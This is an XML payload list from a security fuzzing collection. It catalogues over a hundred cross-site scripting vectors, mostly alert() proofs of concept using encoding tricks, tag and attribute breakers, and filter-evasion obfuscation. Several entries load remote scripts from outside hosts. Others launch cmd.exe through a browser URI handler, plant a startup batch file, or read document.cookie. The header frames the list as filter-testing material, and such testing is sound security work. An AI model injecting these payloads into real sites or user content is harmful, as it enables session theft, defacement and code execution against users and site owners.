SecLists/Fuzzing/XSS/human-friendly/XSS-EnDe-h4k.xml

<?xml version="1.0"?>
<!-- from: http://h4k.in/encoding/
date: 22-feb-08
converted from HTML to XML
modified: 05-dec-11; all ” replaced by \" and all curly single quotes replaced by '
note: many of these vectors target legacy engines (IE CSS expression(), Mozilla -moz-binding/XBL,
LAYER, DYNSRC/LOWSRC, BGSOUND, vbscript:) and are unlikely to fire in current browsers; use the list
to exercise filters and encoders, and confirm each hit manually before reporting it.
-->
<xss>
<attack>
<name>Add onclick event handler</name>
<code>onclick=eval/**/(/ale/.source%2b/rt/.source%2b/(7)/.source);</code>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;s&gt;000&lt;s&gt;%3cs%3e111%3c/s%3e%3c%73%3e%32%32%32%3c%2f%73%3e&amp;#60&amp;#115&amp;#62&amp;#51&amp;#51&amp;#51&amp;#60&amp;#47&amp;#115&amp;#62&amp;#x3c&amp;#x73&amp;#x3e&amp;#x34&amp;#x34&amp;#x34&amp;#x3c&amp;#x2f&amp;#x73&amp;#x3e</code>
<name>Advanced HTML injection locator</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>';alert(0)//\';alert(1)//&quot;;alert(2)//\&quot;;alert(3)//--&gt;&lt;/SCRIPT&gt;&quot;&gt;'&gt;&lt;SCRIPT&gt;alert(4)&lt;/SCRIPT&gt;=&amp;{}&quot;);}alert(6);function xss(){//</code>
<name>Advanced XSS Locator</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>';alert(0)//\';alert(1)//&quot;;alert(2)//\&quot;;alert(3)//--&gt;&lt;/SCRIPT&gt;&quot;&gt;'&gt;&lt;/title&gt;&lt;SCRIPT&gt;alert(4)&lt;/SCRIPT&gt;=&amp;{&lt;/title&gt;&lt;script&gt;alert(5)&lt;/script&gt;}&quot;);}</code>
<name>Advanced XSS Locator for title-Injections</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>aim: &amp;c:\windows\system32\calc.exe&quot; ini=&quot;C:\Documents and Settings\All Users\Start Menu\Programs\Startup\pwnd.bat&quot;</code>
<name>aim: uri exploit</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;div/style=\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss)&gt;</code>
<name>Backslash-obfuscated XBL injection - variant 1</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;div/style=&amp;#92&amp;#45&amp;#92&amp;#109&amp;#111&amp;#92&amp;#122&amp;#92&amp;#45&amp;
#98&amp;#92&amp;#105&amp;#92&amp;#110&amp;#100&amp;#92&amp;#105&amp;#110&amp;#92&amp;#103:&amp;
#92&amp;#117&amp;#114&amp;#108&amp;#40&amp;#47&amp;#47&amp;#98&amp;#117&amp;#115&amp;#105&amp;
#110&amp;#101&amp;#115&amp;#115&amp;#92&amp;#105&amp;#92&amp;#110&amp;#102&amp;#111&amp;#46&amp;
#99&amp;#111&amp;#46&amp;#117&amp;#107&amp;#92&amp;#47&amp;#108&amp;#97&amp;#98&amp;#115
&amp;#92&amp;#47&amp;#120&amp;#98&amp;#108&amp;#92&amp;#47&amp;#120&amp;#98&amp;#108&amp;#92
&amp;#46&amp;#120&amp;#109&amp;#108&amp;#92&amp;#35&amp;#120&amp;#115&amp;#115&amp;#41&amp;&gt;</code>
<name>Backslash-obfuscated XBL injection - variant 2</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;div&amp;nbsp;style=\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss)&gt;</code>
<name>Backslash-obfuscated XBL injection - variant 3</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;div&amp;nbsp &amp;nbsp style=\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss)&gt;</code>
<name>Backslash-obfuscated XBL injection - variant 4</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;x/style=-m\0o\0z\0-b\0i\0nd\0i\0n\0g\0:\0u\0r\0l\0(\0/\0/b\0u\0s\0i\0ne\0s\0s\0i\0nf\0o\0.c\0o\0.\0u\0k\0/\0la\0b\0s\0/\0x\0b\0l\0/\0x\0b\0l\0.\0x\0m\0l\0#\0x\0s\0s\0)&gt;</code>
<name>Backslash-obfuscated XBL injection - variant 5</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;BASE HREF=&quot;javascript:alert('XSS');//&quot;&gt;</code>
<name>BASE</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>`&gt; &lt;script&gt;alert(5)&lt;/script&gt;</code>
<name>Basic back ticked attribute breaker</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&gt; &lt;script&gt;alert(4)&lt;/script&gt;</code>
<name>Basic double quoted attribute breaker</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>xyz onerror=alert(6); </code>
<name>Basic JS breaker</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>1;a=eval;b=alert;a(b(/c/.source));</code>
<name>Basic JS breaker variant 1</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>1];a=eval;b=alert;a(b(17));//</code>
<name>Basic JS breaker variant 2</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>];a=eval;b=alert;a(b(16));//</code>
<name>Basic JS breaker variant 3</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>'];a=eval;b=alert;a(b(15));//</code>
<name>Basic JS breaker variant 4</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>1};a=eval;b=alert;a(b(14));//</code>
<name>Basic JS breaker variant 5</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>'};a=eval;b=alert;a(b(13));//</code>
<name>Basic JS breaker variant 6</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>};a=eval;b=alert;a(b(12));//</code>
<name>Basic JS breaker variant 7</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>a=1;a=eval;b=alert;a(b(11));//</code>
<name>Basic JS breaker variant 8</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>;//%0da=eval;b=alert;a(b(10));//</code>
<name>Basic JS breaker variant 9</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>';//%0da=eval;b=alert;a(b(9));//</code>
<name>Basic JS breaker variant 10</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>'&gt; &lt;script&gt;alert(3)&lt;/script&gt;</code>
<name>Basic single quoted attribute breaker</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;/title&gt;&lt;script&gt;alert(1)&lt;/script&gt;</code>
<name>Basic title breaker</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;BGSOUND SRC=&quot;javascript:alert('XSS');&quot;&gt;</code>
<name>BGSOUND</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;BODY BACKGROUND=&quot;javascript:alert('XSS');&quot;&gt;</code>
<name>BODY background-image</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;BODY ONLOAD=alert('XSS')&gt;</code>
<name>BODY ONLOAD</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;!--
&lt;A href=&quot;
- --&gt;&lt;a href=javascript:alert:document.domain
&gt;test--&gt;</code>
<name>Camouflaged comment injection with JS link</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;IMG SRC=JaVaScRiPt:alert('XSS')&gt;</code>
<name>Case Insensitive</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;%3C&amp;lt&amp;lt;&amp;LT&amp;LT;&amp;#60&amp;#060&amp;#0060&amp;#00060&amp;#000060&amp;#0000060&amp;#60;&amp;#060;&amp;#0060;&amp;#00060;&amp;#000060;&amp;#0000060;&amp;#x3c&amp;#x03c&amp;#x003c&amp;#x0003c&amp;#x00003c&amp;#x000003c&amp;#x3c;&amp;#x03c;&amp;#x003c;&amp;#x0003c;&amp;#x00003c;&amp;#x000003c;&amp;#X3c&amp;#X03c&amp;#X003c&amp;#X0003c&amp;#X00003c&amp;#X000003c&amp;#X3c;&amp;#X03c;&amp;#X003c;&amp;#X0003c;&amp;#X00003c;&amp;#X000003c;&amp;#x3C&amp;#x03C&amp;#x003C&amp;#x0003C&amp;#x00003C&amp;#x000003C&amp;#x3C;&amp;#x03C;&amp;#x003C;&amp;#x0003C;&amp;#x00003C;&amp;#x000003C;&amp;#X3C&amp;#X03C&amp;#X003C&amp;#X0003C&amp;#X00003C&amp;#X000003C&amp;#X3C;&amp;#X03C;&amp;#X003C;&amp;#X0003C;&amp;#X00003C;&amp;#X000003C;\x3c\x3C\u003c\u003C</code>
<name>Character Encoding Example</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;script&gt;
var a = &quot;&lt;/script&gt; &lt;script&gt; alert('XSS !'); &lt;/script&gt; &lt;script&gt;&quot;;
&lt;/script&gt;</code>
<name>Closing JS Tag in JS String assignment</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;!--[if gte IE 4]&gt;&lt;SCRIPT&gt;alert('XSS');&lt;/SCRIPT&gt;&lt;![endif]--&gt;</code>
<name>Commented-out Block</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>*/a=eval;b=alert;a(b(/e/.source));/*</code>
<name>Comment-breaker using obfuscated JavaScript</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>width: expression((window.r==document.cookie)?'':alert(r=document.cookie))</code>
<name>Conditional style injection for IE</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;A HREF=&quot;http://www.gohttp://www.google.com/ogle.com/&quot;&gt;XSS&lt;/A&gt;</code>
<name>Content Replace</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;META HTTP-EQUIV=&quot;Set-Cookie&quot; Content=&quot;USERID=&lt;SCRIPT&gt;alert('XSS')&lt;/SCRIPT&gt;&quot;&gt;</code>
<name>Cookie Manipulation</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;DIV STYLE=&quot;background-image: url(javascript:alert('XSS'))&quot;&gt;</code>
<name>DIV background-image 1</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;DIV STYLE=&quot;background-image: url(&amp;#1;javascript:alert('XSS'))&quot;&gt;</code>
<name>DIV background-image 2</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;DIV STYLE=&quot;width: expression(alert('XSS'));&quot;&gt;</code>
<name>DIV expression</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;DIV STYLE=&quot;background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029&quot;&gt;</code>
<name>DIV w/Unicode</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;IFRAME SRC=http://ha.ckers.org/scriptlet.html &lt;</code>
<name>Double open angle brackets</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;A HREF=&quot;http://1113982867/&quot;&gt;XSS&lt;/A&gt;</code>
<name>Dword Encoding</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;EMBED SRC=&quot;http://ha.ckers.org/xss.swf&quot; AllowScriptAccess=&quot;always&quot;&gt;&lt;/EMBED&gt;</code>
<name>Embed Flash</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;IMG SRC=&quot;jav&amp;#x0D;ascript:alert('XSS');&quot;&gt;</code>
<name>Embedded Carriage Return</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;IMG SRC=&quot;jav&amp;#x09;ascript:alert('XSS');&quot;&gt;</code>
<name>Embedded Encoded Tab</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;IMG SRC=&quot;jav&amp;#x0A;ascript:alert('XSS');&quot;&gt;</code>
<name>Embedded Newline</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;IMG SRC=&quot;javascript:alert('XSS');&quot;&gt;</code>
<name>Embedded Tab</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;/TITLE&gt;&lt;SCRIPT&gt;alert(&quot;XSS&quot;);&lt;/SCRIPT&gt;</code>
<name>End title tag</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>\&quot;;alert('XSS');//</code>
<name>Escaping JavaScript escapes</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;SCRIPT a=&quot;&gt;&quot; SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;</code>
<name>Evade Regex Filter 1</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;SCRIPT =&quot;blah&quot; SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;</code>
<name>Evade Regex Filter 2</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;SCRIPT a=&quot;blah&quot; '' SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;</code>
<name>Evade Regex Filter 3</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;SCRIPT &quot;a='&gt;'&quot; SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;</code>
<name>Evade Regex Filter 4</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;SCRIPT a=`&gt;` SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;</code>
<name>Evade Regex Filter 5</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>eval(name)</code>
<name>Eval string contained in name property</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;A HREF=&quot;http://www.google.com./&quot;&gt;XSS&lt;/A&gt;</code>
<name>Extra dot for Absolute DNS</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;&lt;SCRIPT&gt;alert(&quot;XSS&quot;);//&lt;&lt;/SCRIPT&gt;</code>
<name>Extraneous Open Brackets</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;SCRIPT&gt;document.write(&quot;&lt;SCRI&quot;);&lt;/SCRIPT&gt;PT SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;</code>
<name>Filter Evasion 1</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;SCRIPT a=&quot;&gt;'&gt;&quot; SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;</code>
<name>Filter Evasion 2</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;A HREF=&quot;//google&quot;&gt;XSS&lt;/A&gt;</code>
<name>Firefox Lookups 1</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;A HREF=&quot;http://ha.ckers.org@google&quot;&gt;XSS&lt;/A&gt;</code>
<name>Firefox Lookups 2</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;A HREF=&quot;http://google:ha.ckers.org&quot;&gt;XSS&lt;/A&gt;</code>
<name>Firefox Lookups 3</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>firefoxurl:test|&quot;%20-new-window%20javascript:alert(\'Cross%2520Browser%2520Scripting!\');&quot;</code>
<name>firefoxurl: uri exploit (UXSS)</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;FRAMESET&gt;&lt;FRAME SRC=&quot;javascript:alert('XSS');&quot;&gt;&lt;/FRAMESET&gt;</code>
<name>FRAME</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;IMG SRC=`javascript:alert(&quot;RSnake says, 'XSS'&quot;)`&gt;</code>
<name>Grave Accents</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;IMG SRC=&quot;javascript:alert('XSS')&quot;</code>
<name>Half-Open HTML/JavaScript</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;A HREF=&quot;http://0x42.0x0000066.0x7.0x93/&quot;&gt;XSS&lt;/A&gt;</code>
<name>Hex Encoding</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;IMG SRC=&amp;#x6A&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;#x63&amp;#x72&amp;#x69&amp;#x70&amp;#x74&amp;#x3A&amp;#x61&amp;#x6C&amp;#x65&amp;#x72&amp;#x74&amp;#x28&amp;#x27&amp;#x58&amp;#x53&amp;#x53&amp;#x27&amp;#x29&gt;</code>
<name>Hex Encoding w/out Semicolons</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;IMG SRC=javascript:alert(&amp;quot;XSS&amp;quot;)&gt;</code>
<name>HTML Entities</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>'';!--&quot;&lt;script&gt;alert(0);&lt;/script&gt;=&amp;{(alert(1))}</code>
<name>HTML Quote &amp; Comment breaker</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;?xml version=&quot;1.0&quot;?&gt;
&lt;html:html xmlns:html='http://www.w3.org/1999/xhtml'&gt;
&lt;html:script&gt;
alert(document.cookie);
&lt;/html:script&gt;
&lt;/html:html&gt;</code>
<name>HTML wrapped in XML</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;img src=`x` onrerror= ` ;; alert(1) ` /&gt;</code>
<name>IE backticked semicolon injection</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;/a style=&quot;&quot;xx:expr/**/ession(document.appendChild(document.createElement('script')).src='http://h4k.in/i.js')&quot;&gt;</code>
<name>IE closing-tag expression injection</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code> style=color: expression(alert(0));&quot; a=&quot;</code>
<name>IE expression injection</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>vbscript:Execute(MsgBox(chr(88)&amp;chr(83)&amp;chr(83)))&lt;</code>
<name>IE VB Messagebox injection</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;IFRAME SRC=&quot;javascript:alert('XSS');&quot;&gt;&lt;/IFRAME&gt;</code>
<name>IFRAME</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>a=&lt;a&gt;
&lt;b&gt;
%3c%69%6d%67%2f%73%72%63%3d%31
%20%6f%6e%65%72%72%6f%72%3d%61%6c%65%72%74%28%31%29%3e
&lt;/b&gt;
&lt;/a&gt;
document.write(unescape(a..b))</code>
<name>Image onerror wrapped in XML statement</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;IMG SRC=&quot;jav&amp;#x09;ascript:alert(&lt;WBR&gt;'XSS');&quot;&gt;
&lt;IMG SRC=&quot;jav&amp;#x0A;ascript:alert(&lt;WBR&gt;'XSS');&quot;&gt;
&lt;IMG SRC=&quot;jav&amp;#x0D;ascript:alert(&lt;WBR&gt;'XSS');&quot;&gt;</code>
<name>Image tag with obfuscated JS URI</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))&gt;</code>
<name>Image w/CharCode</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;IMG DYNSRC=&quot;javascript:alert('XSS');&quot;&gt;</code>
<name>IMG Dynsrc</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;IMG SRC=&quot;http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode&quot;&gt;</code>
<name>IMG Embedded commands 1</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>Redirect 302 /a.jpg http://victimsite.com/admin.asp&amp;deleteuser</code>
<name>IMG Embedded commands 2</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;IMG LOWSRC=&quot;javascript:alert('XSS');&quot;&gt;</code>
<name>IMG Lowsrc</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;IMG SRC=javascript:alert('XSS')&gt;</code>
<name>IMG No Quotes/Semicolon</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>exp/*&lt;XSS STYLE='no\xss:noxss(&quot;*//*&quot;);xss:&amp;#101;x&amp;#x2F;*XSS*//*/*/pression(alert(&quot;XSS&quot;))'&gt;</code>
<name>IMG STYLE w/expression</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;IMG SRC=&quot;javascript:alert('XSS');&quot;&gt;</code>
<name>IMG w/JavaScript Directive</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;IMG SRC='vbscript:msgbox(&quot;XSS&quot;)'&gt;</code>
<name>IMG w/VBscript</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;INPUT TYPE=&quot;IMAGE&quot; SRC=&quot;javascript:alert('XSS');&quot;&gt;</code>
<name>INPUT Image</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;A HREF=&quot;http://66.102.7.147/&quot;&gt;XSS&lt;/A&gt;</code>
<name>IP Encoding</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>s1=''+'java'+''+'scr'+'';s2=''+'ipt'+':'+'ale'+'';s3=''+'rt'+''+'(1)'+''; u1=s1+s2+s3;URL=u1</code>
<name>JavaScript concatenation vector variant 1</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>s1=0?'1':'i'; s2=0?'1':'fr'; s3=0?'1':'ame'; i1=s1+s2+s3; s1=0?'1':'jav'; s2=0?'1':'ascr'; s3=0?'1':'ipt'; s4=0?'1':':'; s5=0?'1':'ale'; s6=0?'1':'rt'; s7=0?'1':'(1)'; i2=s1+s2+s3+s4+s5+s6+s7;</code>
<name>JavaScript concatenation vector variant 2</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>s1=0?'':'i';s2=0?'':'fr';s3=0?'':'ame';i1=s1+s2+s3;s1=0?'':'jav';s2=0?'':'ascr';s3=0?'':'ipt';s4=0?'':':';s5=0?'':'ale';s6=0?'':'rt';s7=0?'':'(1)';i2=s1+s2+s3+s4+s5+s6+s7;i=createElement(i1);i.src=i2;x=parentNode;x.appendChild(i);</code>
<name>JavaScript concatenation vector variant 3</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>s1=['java'+''+''+'scr'+'ipt'+':'+'aler'+'t'+'(1)'];</code>
<name>JavaScript concatenation vector variant 4</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>s1=['java'||''+'']; s2=['scri'||''+'']; s3=['pt'||''+''];</code>
<name>JavaScript concatenation vector variant 5</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>s1=!''&amp;&amp;'jav';s2=!''&amp;&amp;'ascript';s3=!''&amp;&amp;':';s4=!''&amp;&amp;'aler';s5=!''&amp;&amp;'t';s6=!''&amp;&amp;'(1)';s7=s1+s2+s3+s4+s5+s6;URL=s7;</code>
<name>JavaScript concatenation vector variant 6</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>s1='java'||''+'';s2='scri'||''+'';s3='pt'||''+'';</code>
<name>JavaScript concatenation vector variant 7</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;BR SIZE=&quot;&amp;{alert('XSS')}&quot;&gt;</code>
<name>JavaScript Includes</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;A HREF=&quot;javascript:document.location='http://www.google.com/'&quot;&gt;XSS&lt;/A&gt;</code>
<name>JavaScript Link Location</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>%0da=eval;b=alert;a(b(/d/.source));</code>
<name>JavaScript-breaker using carriage return</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;a href = &quot;javas cript :ale rt(1)&quot;&gt;test</code>
<name>JS link with whitespace obfuscation</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>+alert(0)+</code>
<name>JS string concatenation breaker</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;body onload=;a2={y:eval};a1={x:a2.y('al'+'ert')};;;;;;;;;_=a1.x;_(1);;;;</code>
<name>JSON based obfuscated onload vector</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;body onload=a1={x:this.parent.document};a1.x.writeln(1);&gt;</code>
<name>JSON based onload vector</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;body onload=;a1={x:document};;;;;;;;;_=a1.x;_.write(1);;;;</code>
<name>JSON based semicolon-onload vector</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;LAYER SRC=&quot;http://ha.ckers.org/scriptlet.html&quot;&gt;&lt;/LAYER&gt;</code>
<name>LAYER</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;STYLE&gt;li {list-style-image: url(&quot;javascript:alert('XSS')&quot;);}&lt;/STYLE&gt;&lt;UL&gt;&lt;LI&gt;XSS</code>
<name>List-style-image</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;IMG SRC=&quot;livescript:[code]&quot;&gt;</code>
<name>Livescript</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;XSS STYLE=&quot;behavior: url(http://ha.ckers.org/xss.htc);&quot;&gt;</code>
<name>Local .htc file</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;IMG SRC=&amp;#0000106&amp;#0000097&amp;#0000118&amp;#0000097&amp;#0000115&amp;#0000099&amp;#0000114&amp;#0000105&amp;#0000112&amp;#0000116&amp;#0000058&amp;#0000097&amp;#0000108&amp;#0000101&amp;#0000114&amp;#0000116&amp;#0000040&amp;#0000039&amp;#0000088&amp;#0000083&amp;#0000083&amp;#0000039&amp;#0000041&gt;</code>
<name>Long UTF-8 Unicode w/out Semicolons</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;IMG &quot;&quot;&quot;&gt;&lt;SCRIPT&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;&quot;&gt;</code>
<name>Malformed IMG Tags</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>%26%2339);x=alert;x(%26%2340 /finally through!/.source %26%2341);//</code>
<name>Markup breaker with special quotes</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;META HTTP-EQUIV=&quot;refresh&quot; CONTENT=&quot;0;url=javascript:alert('XSS');&quot;&gt;</code>
<name>META</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;META HTTP-EQUIV=&quot;refresh&quot; CONTENT=&quot;0; URL=http://;URL=javascript:alert('XSS');&quot;&gt;</code>
<name>META w/additional URL parameter</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;META HTTP-EQUIV=&quot;refresh&quot; CONTENT=&quot;0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K&quot;&gt;</code>
<name>META w/data:URL</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;A HREF=&quot;http://6&amp;#09;6.000146.0x7.147/&quot;&gt;XSS&lt;/A&gt;</code>
<name>Mixed Encoding</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;IMG SRC=&quot;mocha:[code]&quot;&gt;</code>
<name>Mocha</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code> style=-moz-binding:url(http://h4k.in/mozxss.xml#xss);&quot; a=&quot;</code>
<name>Mozilla -moz-binding-url injection</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code> sstyle=foobar&quot;tstyle=&quot;foobar&quot;ystyle=&quot;foobar&quot;lstyle=&quot;foobar&quot;estyle=&quot;foobar&quot;=-moz-binding:url(http://h4k.in/mozxss.xml#xss)&gt;foobar&lt;/b&gt;#xss)&quot; a=&quot;</code>
<name>Mozilla -moz-binding-url injection - filter evading</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>_
=
eval
b=1
__
=
location
c=1
_
(
__
.
hash
//
.
substr
(1)
)</code>
<name>Multiline selfcontained XSS</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;IMGSRC=&quot;javascript:alert('XSS')&quot;&gt;</code>
<name>Multiline w/Carriage Returns</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>b=top,a=/loc/ . source,a+=/ation/ . source,b[a=a] = name</code>
<name>Name contained XSS variant 1</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>a=/ev///
.source a+=/al///
.source a[a] (name)</code>
<name>Name contained XSS variant 2</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>a=/ev/
.source a+=/al/
.source,a = a[a] a(name)</code>
<name>Name contained XSS variant 3</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>setTimeout//
(name// ,0)</code>
<name>Name contained XSS variant 4</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>navigatorurl:test&quot; -chrome &quot;javascript:C=Components.classes;I=Components.interfaces;file=C[\'@mozilla.org/file/local;1\'].createInstance(I.nsILocalFile);file.initWithPath(\'C:\'+String.fromCharCode(92)+String.fromCharCode(92)+\'Windows\'+String.fromCharCode(92)+String.fromCharCode(92)+\'System32\'+String.fromCharCode(92)+String.fromCharCode(92)+\'cmd.exe\');process=C[\'@mozilla.org/process/util;1\'].createInstance(I.nsIProcess);process.init(file);process.run(true%252c{}%252c0);alert(process)</code>
<name>navigatorurl: code execution</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;SCRIPT SRC=http://ha.ckers.org/xss.js</code>
<name>No Closing Script Tag</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;SCRIPT&gt;a=/XSS/alert(a.source)&lt;/SCRIPT&gt;</code>
<name>No Quotes/Semicolons</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;SCRIPT/XSS SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;</code>
<name>Non-Alpha/Non-Digit</name>
<desc></desc>
<label></label>
</attack>
